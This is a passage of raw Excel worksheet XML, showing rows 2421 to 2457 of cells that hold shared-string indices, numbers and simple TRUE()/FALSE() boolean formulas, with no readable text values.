        <v>2754</v>
      </c>
      <c r="T2421" t="s">
        <v>7</v>
      </c>
      <c r="U2421" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2422" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2422" s="1">
        <v>18790</v>
      </c>
      <c r="B2422" t="s">
        <v>0</v>
      </c>
      <c r="C2422" t="s">
        <v>111</v>
      </c>
      <c r="D2422" t="s">
        <v>2813</v>
      </c>
      <c r="E2422" t="s">
        <v>2752</v>
      </c>
      <c r="F2422">
        <v>5901</v>
      </c>
      <c r="G2422" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2422" t="s">
        <v>2824</v>
      </c>
      <c r="K2422">
        <v>0</v>
      </c>
      <c r="R2422" t="s">
        <v>20</v>
      </c>
      <c r="S2422" t="s">
        <v>2754</v>
      </c>
      <c r="T2422" t="s">
        <v>7</v>
      </c>
      <c r="U2422" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2423" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2423" s="1">
        <v>18791</v>
      </c>
      <c r="B2423" t="s">
        <v>0</v>
      </c>
      <c r="C2423" t="s">
        <v>111</v>
      </c>
      <c r="D2423" t="s">
        <v>2813</v>
      </c>
      <c r="E2423" t="s">
        <v>2752</v>
      </c>
      <c r="F2423">
        <v>5901</v>
      </c>
      <c r="G2423" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2423" t="s">
        <v>2825</v>
      </c>
      <c r="K2423">
        <v>0</v>
      </c>
      <c r="R2423" t="s">
        <v>20</v>
      </c>
      <c r="S2423" t="s">
        <v>2754</v>
      </c>
      <c r="T2423" t="s">
        <v>7</v>
      </c>
      <c r="U2423" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2424" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2424" s="1">
        <v>18792</v>
      </c>
      <c r="B2424" t="s">
        <v>0</v>
      </c>
      <c r="C2424" t="s">
        <v>111</v>
      </c>
      <c r="D2424" t="s">
        <v>2813</v>
      </c>
      <c r="E2424" t="s">
        <v>2752</v>
      </c>
      <c r="F2424">
        <v>5901</v>
      </c>
      <c r="G2424" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2424" t="s">
        <v>2826</v>
      </c>
      <c r="K2424">
        <v>0</v>
      </c>
      <c r="R2424" t="s">
        <v>20</v>
      </c>
      <c r="S2424" t="s">
        <v>2754</v>
      </c>
      <c r="T2424" t="s">
        <v>7</v>
      </c>
      <c r="U2424" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2425" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2425" s="1">
        <v>18793</v>
      </c>
      <c r="B2425" t="s">
        <v>0</v>
      </c>
      <c r="C2425" t="s">
        <v>111</v>
      </c>
      <c r="D2425" t="s">
        <v>2813</v>
      </c>
      <c r="E2425" t="s">
        <v>2752</v>
      </c>
      <c r="F2425">
        <v>5901</v>
      </c>
      <c r="G2425" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2425" t="s">
        <v>2827</v>
      </c>
      <c r="K2425">
        <v>0</v>
      </c>
      <c r="R2425" t="s">
        <v>20</v>
      </c>
      <c r="S2425" t="s">
        <v>2754</v>
      </c>
      <c r="T2425" t="s">
        <v>7</v>
      </c>
      <c r="U2425" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2426" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2426" s="1">
        <v>18794</v>
      </c>
      <c r="B2426" t="s">
        <v>0</v>
      </c>
      <c r="C2426" t="s">
        <v>111</v>
      </c>
      <c r="D2426" t="s">
        <v>2813</v>
      </c>
      <c r="E2426" t="s">
        <v>2752</v>
      </c>
      <c r="F2426">
        <v>5901</v>
      </c>
      <c r="G2426" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2426" t="s">
        <v>2828</v>
      </c>
      <c r="K2426">
        <v>0</v>
      </c>
      <c r="R2426" t="s">
        <v>20</v>
      </c>
      <c r="S2426" t="s">
        <v>2754</v>
      </c>
      <c r="T2426" t="s">
        <v>7</v>
      </c>
      <c r="U2426" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2427" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2427" s="1">
        <v>18795</v>
      </c>
      <c r="B2427" t="s">
        <v>0</v>
      </c>
      <c r="C2427" t="s">
        <v>111</v>
      </c>
      <c r="D2427" t="s">
        <v>2813</v>
      </c>
      <c r="E2427" t="s">
        <v>2752</v>
      </c>
      <c r="F2427">
        <v>5901</v>
      </c>
      <c r="G2427" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2427" t="s">
        <v>2829</v>
      </c>
      <c r="K2427">
        <v>0</v>
      </c>
      <c r="R2427" t="s">
        <v>20</v>
      </c>
      <c r="S2427" t="s">
        <v>2754</v>
      </c>
      <c r="T2427" t="s">
        <v>7</v>
      </c>
      <c r="U2427" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2428" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2428" s="1">
        <v>18796</v>
      </c>
      <c r="B2428" t="s">
        <v>0</v>
      </c>
      <c r="C2428" t="s">
        <v>111</v>
      </c>
      <c r="D2428" t="s">
        <v>2813</v>
      </c>
      <c r="E2428" t="s">
        <v>2752</v>
      </c>
      <c r="F2428">
        <v>5901</v>
      </c>
      <c r="G2428" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2428" t="s">
        <v>2830</v>
      </c>
      <c r="K2428">
        <v>0</v>
      </c>
      <c r="R2428" t="s">
        <v>20</v>
      </c>
      <c r="S2428" t="s">
        <v>2754</v>
      </c>
      <c r="T2428" t="s">
        <v>7</v>
      </c>
      <c r="U2428" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2429" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2429" s="1">
        <v>18797</v>
      </c>
      <c r="B2429" t="s">
        <v>0</v>
      </c>
      <c r="C2429" t="s">
        <v>111</v>
      </c>
      <c r="D2429" t="s">
        <v>2813</v>
      </c>
      <c r="E2429" t="s">
        <v>2752</v>
      </c>
      <c r="F2429">
        <v>5901</v>
      </c>
      <c r="G2429" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2429" t="s">
        <v>2831</v>
      </c>
      <c r="K2429">
        <v>0</v>
      </c>
      <c r="R2429" t="s">
        <v>20</v>
      </c>
      <c r="S2429" t="s">
        <v>2754</v>
      </c>
      <c r="T2429" t="s">
        <v>7</v>
      </c>
      <c r="U2429" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2430" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2430" s="1">
        <v>18798</v>
      </c>
      <c r="B2430" t="s">
        <v>0</v>
      </c>
      <c r="C2430" t="s">
        <v>111</v>
      </c>
      <c r="D2430" t="s">
        <v>2813</v>
      </c>
      <c r="E2430" t="s">
        <v>2752</v>
      </c>
      <c r="F2430">
        <v>5901</v>
      </c>
      <c r="G2430" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2430" t="s">
        <v>2832</v>
      </c>
      <c r="K2430">
        <v>0</v>
      </c>
      <c r="R2430" t="s">
        <v>20</v>
      </c>
      <c r="S2430" t="s">
        <v>2754</v>
      </c>
      <c r="T2430" t="s">
        <v>7</v>
      </c>
      <c r="U2430" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2431" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2431" s="1">
        <v>18799</v>
      </c>
      <c r="B2431" t="s">
        <v>0</v>
      </c>
      <c r="C2431" t="s">
        <v>111</v>
      </c>
      <c r="D2431" t="s">
        <v>2813</v>
      </c>
      <c r="E2431" t="s">
        <v>2752</v>
      </c>
      <c r="F2431">
        <v>5901</v>
      </c>
      <c r="G2431" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2431" t="s">
        <v>2833</v>
      </c>
      <c r="K2431">
        <v>0</v>
      </c>
      <c r="R2431" t="s">
        <v>20</v>
      </c>
      <c r="S2431" t="s">
        <v>2754</v>
      </c>
      <c r="T2431" t="s">
        <v>7</v>
      </c>
      <c r="U2431" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2432" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2432" s="1">
        <v>18800</v>
      </c>
      <c r="B2432" t="s">
        <v>0</v>
      </c>
      <c r="C2432" t="s">
        <v>111</v>
      </c>
      <c r="D2432" t="s">
        <v>2813</v>
      </c>
      <c r="E2432" t="s">
        <v>2752</v>
      </c>
      <c r="F2432">
        <v>5901</v>
      </c>
      <c r="G2432" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2432" t="s">
        <v>2834</v>
      </c>
      <c r="K2432">
        <v>0</v>
      </c>
      <c r="R2432" t="s">
        <v>20</v>
      </c>
      <c r="S2432" t="s">
        <v>2754</v>
      </c>
      <c r="T2432" t="s">
        <v>7</v>
      </c>
      <c r="U2432" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2433" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2433" s="1">
        <v>18801</v>
      </c>
      <c r="B2433" t="s">
        <v>0</v>
      </c>
      <c r="C2433" t="s">
        <v>111</v>
      </c>
      <c r="D2433" t="s">
        <v>2813</v>
      </c>
      <c r="E2433" t="s">
        <v>2752</v>
      </c>
      <c r="F2433">
        <v>5901</v>
      </c>
      <c r="G2433" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2433" t="s">
        <v>2835</v>
      </c>
      <c r="K2433">
        <v>0</v>
      </c>
      <c r="R2433" t="s">
        <v>20</v>
      </c>
      <c r="S2433" t="s">
        <v>2754</v>
      </c>
      <c r="T2433" t="s">
        <v>7</v>
      </c>
      <c r="U2433" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2434" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2434" s="1">
        <v>18802</v>
      </c>
      <c r="B2434" t="s">
        <v>0</v>
      </c>
      <c r="C2434" t="s">
        <v>111</v>
      </c>
      <c r="D2434" t="s">
        <v>2813</v>
      </c>
      <c r="E2434" t="s">
        <v>2752</v>
      </c>
      <c r="F2434">
        <v>5901</v>
      </c>
      <c r="G2434" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2434" t="s">
        <v>2836</v>
      </c>
      <c r="K2434">
        <v>0</v>
      </c>
      <c r="R2434" t="s">
        <v>20</v>
      </c>
      <c r="S2434" t="s">
        <v>2754</v>
      </c>
      <c r="T2434" t="s">
        <v>7</v>
      </c>
      <c r="U2434" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2435" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2435" s="1">
        <v>18803</v>
      </c>
      <c r="B2435" t="s">
        <v>0</v>
      </c>
      <c r="C2435" t="s">
        <v>111</v>
      </c>
      <c r="D2435" t="s">
        <v>2813</v>
      </c>
      <c r="E2435" t="s">
        <v>2752</v>
      </c>
      <c r="F2435">
        <v>5901</v>
      </c>
      <c r="G2435" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2435" t="s">
        <v>2837</v>
      </c>
      <c r="K2435">
        <v>0</v>
      </c>
      <c r="R2435" t="s">
        <v>20</v>
      </c>
      <c r="S2435" t="s">
        <v>2754</v>
      </c>
      <c r="T2435" t="s">
        <v>7</v>
      </c>
      <c r="U2435" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2436" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2436" s="1">
        <v>18804</v>
      </c>
      <c r="B2436" t="s">
        <v>0</v>
      </c>
      <c r="C2436" t="s">
        <v>111</v>
      </c>
      <c r="D2436" t="s">
        <v>2813</v>
      </c>
      <c r="E2436" t="s">
        <v>2752</v>
      </c>
      <c r="F2436">
        <v>5901</v>
      </c>
      <c r="G2436" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2436" t="s">
        <v>2838</v>
      </c>
      <c r="K2436">
        <v>0</v>
      </c>
      <c r="R2436" t="s">
        <v>20</v>
      </c>
      <c r="S2436" t="s">
        <v>2754</v>
      </c>
      <c r="T2436" t="s">
        <v>7</v>
      </c>
      <c r="U2436" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2437" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2437" s="1">
        <v>18805</v>
      </c>
      <c r="B2437" t="s">
        <v>0</v>
      </c>
      <c r="C2437" t="s">
        <v>111</v>
      </c>
      <c r="D2437" t="s">
        <v>2813</v>
      </c>
      <c r="E2437" t="s">
        <v>2752</v>
      </c>
      <c r="F2437">
        <v>5901</v>
      </c>
      <c r="G2437" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2437" t="s">
        <v>2839</v>
      </c>
      <c r="K2437">
        <v>0</v>
      </c>
      <c r="R2437" t="s">
        <v>20</v>
      </c>
      <c r="S2437" t="s">
        <v>2754</v>
      </c>
      <c r="T2437" t="s">
        <v>7</v>
      </c>
      <c r="U2437" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2438" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2438" s="1">
        <v>18806</v>
      </c>
      <c r="B2438" t="s">
        <v>0</v>
      </c>
      <c r="C2438" t="s">
        <v>111</v>
      </c>
      <c r="D2438" t="s">
        <v>2813</v>
      </c>
      <c r="E2438" t="s">
        <v>2752</v>
      </c>
      <c r="F2438">
        <v>5901</v>
      </c>
      <c r="G2438" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2438" t="s">
        <v>2840</v>
      </c>
      <c r="K2438">
        <v>0</v>
      </c>
      <c r="R2438" t="s">
        <v>20</v>
      </c>
      <c r="S2438" t="s">
        <v>2754</v>
      </c>
      <c r="T2438" t="s">
        <v>7</v>
      </c>
      <c r="U2438" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2439" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2439" s="1">
        <v>18807</v>
      </c>
      <c r="B2439" t="s">
        <v>0</v>
      </c>
      <c r="C2439" t="s">
        <v>111</v>
      </c>
      <c r="D2439" t="s">
        <v>2813</v>
      </c>
      <c r="E2439" t="s">
        <v>2752</v>
      </c>
      <c r="F2439">
        <v>5901</v>
      </c>
      <c r="G2439" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2439" t="s">
        <v>2841</v>
      </c>
      <c r="K2439">
        <v>0</v>
      </c>
      <c r="R2439" t="s">
        <v>20</v>
      </c>
      <c r="S2439" t="s">
        <v>2754</v>
      </c>
      <c r="T2439" t="s">
        <v>7</v>
      </c>
      <c r="U2439" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2440" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2440" s="1">
        <v>18808</v>
      </c>
      <c r="B2440" t="s">
        <v>0</v>
      </c>
      <c r="C2440" t="s">
        <v>111</v>
      </c>
      <c r="D2440" t="s">
        <v>2813</v>
      </c>
      <c r="E2440" t="s">
        <v>2752</v>
      </c>
      <c r="F2440">
        <v>5901</v>
      </c>
      <c r="G2440" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2440" t="s">
        <v>2842</v>
      </c>
      <c r="K2440">
        <v>0</v>
      </c>
      <c r="R2440" t="s">
        <v>20</v>
      </c>
      <c r="S2440" t="s">
        <v>2754</v>
      </c>
      <c r="T2440" t="s">
        <v>7</v>
      </c>
      <c r="U2440" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2441" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2441" s="1">
        <v>18809</v>
      </c>
      <c r="B2441" t="s">
        <v>0</v>
      </c>
      <c r="C2441" t="s">
        <v>111</v>
      </c>
      <c r="D2441" t="s">
        <v>2843</v>
      </c>
      <c r="E2441" t="s">
        <v>2752</v>
      </c>
      <c r="F2441">
        <v>5871</v>
      </c>
      <c r="G2441" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2441" t="s">
        <v>2844</v>
      </c>
      <c r="K2441">
        <v>0</v>
      </c>
      <c r="L2441" t="s">
        <v>2845</v>
      </c>
      <c r="R2441" t="s">
        <v>20</v>
      </c>
      <c r="S2441" t="s">
        <v>2754</v>
      </c>
      <c r="T2441" t="s">
        <v>7</v>
      </c>
      <c r="U2441" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2442" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2442" s="1">
        <v>18810</v>
      </c>
      <c r="B2442" t="s">
        <v>0</v>
      </c>
      <c r="C2442" t="s">
        <v>111</v>
      </c>
      <c r="D2442" t="s">
        <v>2843</v>
      </c>
      <c r="E2442" t="s">
        <v>2752</v>
      </c>
      <c r="F2442">
        <v>5871</v>
      </c>
      <c r="G2442" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2442" t="s">
        <v>2846</v>
      </c>
      <c r="K2442">
        <v>0</v>
      </c>
      <c r="L2442" t="s">
        <v>2845</v>
      </c>
      <c r="R2442" t="s">
        <v>20</v>
      </c>
      <c r="S2442" t="s">
        <v>2754</v>
      </c>
      <c r="T2442" t="s">
        <v>7</v>
      </c>
      <c r="U2442" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2443" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2443" s="1">
        <v>18811</v>
      </c>
      <c r="B2443" t="s">
        <v>0</v>
      </c>
      <c r="C2443" t="s">
        <v>111</v>
      </c>
      <c r="D2443" t="s">
        <v>2843</v>
      </c>
      <c r="E2443" t="s">
        <v>2752</v>
      </c>
      <c r="F2443">
        <v>5871</v>
      </c>
      <c r="G2443" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2443" t="s">
        <v>2847</v>
      </c>
      <c r="K2443">
        <v>0</v>
      </c>
      <c r="L2443" t="s">
        <v>2845</v>
      </c>
      <c r="R2443" t="s">
        <v>20</v>
      </c>
      <c r="S2443" t="s">
        <v>2754</v>
      </c>
      <c r="T2443" t="s">
        <v>7</v>
      </c>
      <c r="U2443" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2444" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2444" s="1">
        <v>18812</v>
      </c>
      <c r="B2444" t="s">
        <v>0</v>
      </c>
      <c r="C2444" t="s">
        <v>111</v>
      </c>
      <c r="D2444" t="s">
        <v>2848</v>
      </c>
      <c r="E2444" t="s">
        <v>2752</v>
      </c>
      <c r="F2444">
        <v>5850</v>
      </c>
      <c r="G2444" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2444" t="s">
        <v>2849</v>
      </c>
      <c r="K2444">
        <v>0</v>
      </c>
      <c r="L2444" t="s">
        <v>2850</v>
      </c>
      <c r="R2444" t="s">
        <v>20</v>
      </c>
      <c r="S2444" t="s">
        <v>2754</v>
      </c>
      <c r="T2444" t="s">
        <v>7</v>
      </c>
      <c r="U2444" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2445" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2445" s="1">
        <v>18813</v>
      </c>
      <c r="B2445" t="s">
        <v>0</v>
      </c>
      <c r="C2445" t="s">
        <v>111</v>
      </c>
      <c r="D2445" t="s">
        <v>2848</v>
      </c>
      <c r="E2445" t="s">
        <v>2752</v>
      </c>
      <c r="F2445">
        <v>5850</v>
      </c>
      <c r="G2445" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2445" t="s">
        <v>2851</v>
      </c>
      <c r="K2445">
        <v>0</v>
      </c>
      <c r="L2445" t="s">
        <v>2850</v>
      </c>
      <c r="R2445" t="s">
        <v>20</v>
      </c>
      <c r="S2445" t="s">
        <v>2754</v>
      </c>
      <c r="T2445" t="s">
        <v>7</v>
      </c>
      <c r="U2445" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2446" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2446" s="1">
        <v>18814</v>
      </c>
      <c r="B2446" t="s">
        <v>0</v>
      </c>
      <c r="C2446" t="s">
        <v>111</v>
      </c>
      <c r="D2446" t="s">
        <v>2848</v>
      </c>
      <c r="E2446" t="s">
        <v>2752</v>
      </c>
      <c r="F2446">
        <v>5850</v>
      </c>
      <c r="G2446" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2446" t="s">
        <v>2852</v>
      </c>
      <c r="K2446">
        <v>0</v>
      </c>
      <c r="L2446" t="s">
        <v>2850</v>
      </c>
      <c r="R2446" t="s">
        <v>20</v>
      </c>
      <c r="S2446" t="s">
        <v>2754</v>
      </c>
      <c r="T2446" t="s">
        <v>7</v>
      </c>
      <c r="U2446" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2447" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2447" s="1">
        <v>18815</v>
      </c>
      <c r="B2447" t="s">
        <v>0</v>
      </c>
      <c r="C2447" t="s">
        <v>111</v>
      </c>
      <c r="D2447" t="s">
        <v>2848</v>
      </c>
      <c r="E2447" t="s">
        <v>2752</v>
      </c>
      <c r="F2447">
        <v>5850</v>
      </c>
      <c r="G2447" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2447" t="s">
        <v>2853</v>
      </c>
      <c r="K2447">
        <v>0</v>
      </c>
      <c r="L2447" t="s">
        <v>2850</v>
      </c>
      <c r="R2447" t="s">
        <v>20</v>
      </c>
      <c r="S2447" t="s">
        <v>2754</v>
      </c>
      <c r="T2447" t="s">
        <v>7</v>
      </c>
      <c r="U2447" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2448" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2448" s="1">
        <v>18816</v>
      </c>
      <c r="B2448" t="s">
        <v>0</v>
      </c>
      <c r="C2448" t="s">
        <v>111</v>
      </c>
      <c r="D2448" t="s">
        <v>2848</v>
      </c>
      <c r="E2448" t="s">
        <v>2752</v>
      </c>
      <c r="F2448">
        <v>5850</v>
      </c>
      <c r="G2448" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2448" t="s">
        <v>2854</v>
      </c>
      <c r="K2448">
        <v>0</v>
      </c>
      <c r="L2448" t="s">
        <v>2850</v>
      </c>
      <c r="R2448" t="s">
        <v>20</v>
      </c>
      <c r="S2448" t="s">
        <v>2754</v>
      </c>
      <c r="T2448" t="s">
        <v>7</v>
      </c>
      <c r="U2448" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2449" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2449" s="1">
        <v>18817</v>
      </c>
      <c r="B2449" t="s">
        <v>0</v>
      </c>
      <c r="C2449" t="s">
        <v>111</v>
      </c>
      <c r="D2449" t="s">
        <v>2848</v>
      </c>
      <c r="E2449" t="s">
        <v>2752</v>
      </c>
      <c r="F2449">
        <v>5850</v>
      </c>
      <c r="G2449" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2449" t="s">
        <v>2855</v>
      </c>
      <c r="K2449">
        <v>0</v>
      </c>
      <c r="L2449" t="s">
        <v>2850</v>
      </c>
      <c r="R2449" t="s">
        <v>20</v>
      </c>
      <c r="S2449" t="s">
        <v>2754</v>
      </c>
      <c r="T2449" t="s">
        <v>7</v>
      </c>
      <c r="U2449" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2450" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2450" s="1">
        <v>18818</v>
      </c>
      <c r="B2450" t="s">
        <v>0</v>
      </c>
      <c r="C2450" t="s">
        <v>111</v>
      </c>
      <c r="D2450" t="s">
        <v>2848</v>
      </c>
      <c r="E2450" t="s">
        <v>2752</v>
      </c>
      <c r="F2450">
        <v>5850</v>
      </c>
      <c r="G2450" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2450" t="s">
        <v>2856</v>
      </c>
      <c r="K2450">
        <v>0</v>
      </c>
      <c r="L2450" t="s">
        <v>2850</v>
      </c>
      <c r="R2450" t="s">
        <v>20</v>
      </c>
      <c r="S2450" t="s">
        <v>2754</v>
      </c>
      <c r="T2450" t="s">
        <v>7</v>
      </c>
      <c r="U2450" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2451" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2451" s="1">
        <v>18819</v>
      </c>
      <c r="B2451" t="s">
        <v>0</v>
      </c>
      <c r="C2451" t="s">
        <v>111</v>
      </c>
      <c r="D2451" t="s">
        <v>2848</v>
      </c>
      <c r="E2451" t="s">
        <v>2752</v>
      </c>
      <c r="F2451">
        <v>5850</v>
      </c>
      <c r="G2451" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2451" t="s">
        <v>2857</v>
      </c>
      <c r="K2451">
        <v>0</v>
      </c>
      <c r="L2451" t="s">
        <v>2850</v>
      </c>
      <c r="R2451" t="s">
        <v>20</v>
      </c>
      <c r="S2451" t="s">
        <v>2754</v>
      </c>
      <c r="T2451" t="s">
        <v>7</v>
      </c>
      <c r="U2451" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2452" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2452" s="1">
        <v>18820</v>
      </c>
      <c r="B2452" t="s">
        <v>0</v>
      </c>
      <c r="C2452" t="s">
        <v>111</v>
      </c>
      <c r="D2452" t="s">
        <v>2858</v>
      </c>
      <c r="E2452" t="s">
        <v>2752</v>
      </c>
      <c r="F2452">
        <v>5834</v>
      </c>
      <c r="G2452" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2452" t="s">
        <v>2859</v>
      </c>
      <c r="K2452">
        <v>0</v>
      </c>
      <c r="L2452" t="s">
        <v>2860</v>
      </c>
      <c r="R2452" t="s">
        <v>20</v>
      </c>
      <c r="S2452" t="s">
        <v>2754</v>
      </c>
      <c r="T2452" t="s">
        <v>7</v>
      </c>
      <c r="U2452" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2453" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2453" s="1">
        <v>18821</v>
      </c>
      <c r="B2453" t="s">
        <v>44</v>
      </c>
      <c r="C2453" t="s">
        <v>45</v>
      </c>
      <c r="D2453" t="s">
        <v>2861</v>
      </c>
      <c r="E2453" t="s">
        <v>2862</v>
      </c>
      <c r="F2453">
        <v>724</v>
      </c>
      <c r="G2453" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2453" t="s">
        <v>2863</v>
      </c>
      <c r="K2453">
        <v>0</v>
      </c>
      <c r="R2453" t="s">
        <v>20</v>
      </c>
      <c r="S2453" t="s">
        <v>2864</v>
      </c>
      <c r="T2453" t="s">
        <v>7</v>
      </c>
      <c r="U2453" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2454" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2454" s="1">
        <v>18822</v>
      </c>
      <c r="B2454" t="s">
        <v>44</v>
      </c>
      <c r="C2454" t="s">
        <v>45</v>
      </c>
      <c r="D2454" t="s">
        <v>2861</v>
      </c>
      <c r="E2454" t="s">
        <v>2862</v>
      </c>
      <c r="F2454">
        <v>724</v>
      </c>
      <c r="G2454" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2454" t="s">
        <v>2865</v>
      </c>
      <c r="K2454">
        <v>0</v>
      </c>
      <c r="R2454" t="s">
        <v>20</v>
      </c>
      <c r="S2454" t="s">
        <v>2864</v>
      </c>
      <c r="T2454" t="s">
        <v>7</v>
      </c>
      <c r="U2454" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2455" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2455" s="1">
        <v>18823</v>
      </c>
      <c r="B2455" t="s">
        <v>10</v>
      </c>
      <c r="C2455" t="s">
        <v>64</v>
      </c>
      <c r="D2455" t="s">
        <v>2866</v>
      </c>
      <c r="E2455" t="s">
        <v>2862</v>
      </c>
      <c r="F2455">
        <v>269</v>
      </c>
      <c r="G2455" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2455" t="s">
        <v>2867</v>
      </c>
      <c r="K2455">
        <v>0</v>
      </c>
      <c r="L2455" t="s">
        <v>2868</v>
      </c>
      <c r="R2455" t="s">
        <v>20</v>
      </c>
      <c r="S2455" t="s">
        <v>2864</v>
      </c>
      <c r="T2455" t="s">
        <v>7</v>
      </c>
      <c r="U2455" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2456" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2456" s="1">
        <v>18824</v>
      </c>
      <c r="B2456" t="s">
        <v>10</v>
      </c>
      <c r="C2456" t="s">
        <v>64</v>
      </c>
      <c r="D2456" t="s">
        <v>2866</v>
      </c>
      <c r="E2456" t="s">
        <v>2862</v>
      </c>
      <c r="F2456">
        <v>269</v>
      </c>
      <c r="G2456" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2456" t="s">
        <v>2869</v>
      </c>
      <c r="K2456">
        <v>0</v>
      </c>
      <c r="L2456" t="s">
        <v>2868</v>
      </c>
      <c r="R2456" t="s">
        <v>20</v>
      </c>
      <c r="S2456" t="s">
        <v>2864</v>
      </c>
      <c r="T2456" t="s">
        <v>7</v>
      </c>
      <c r="U2456" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2457" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2457" s="1">
        <v>18825</v>
      </c>
      <c r="B2457" t="s">
        <v>10</v>
      </c>
      <c r="C2457" t="s">
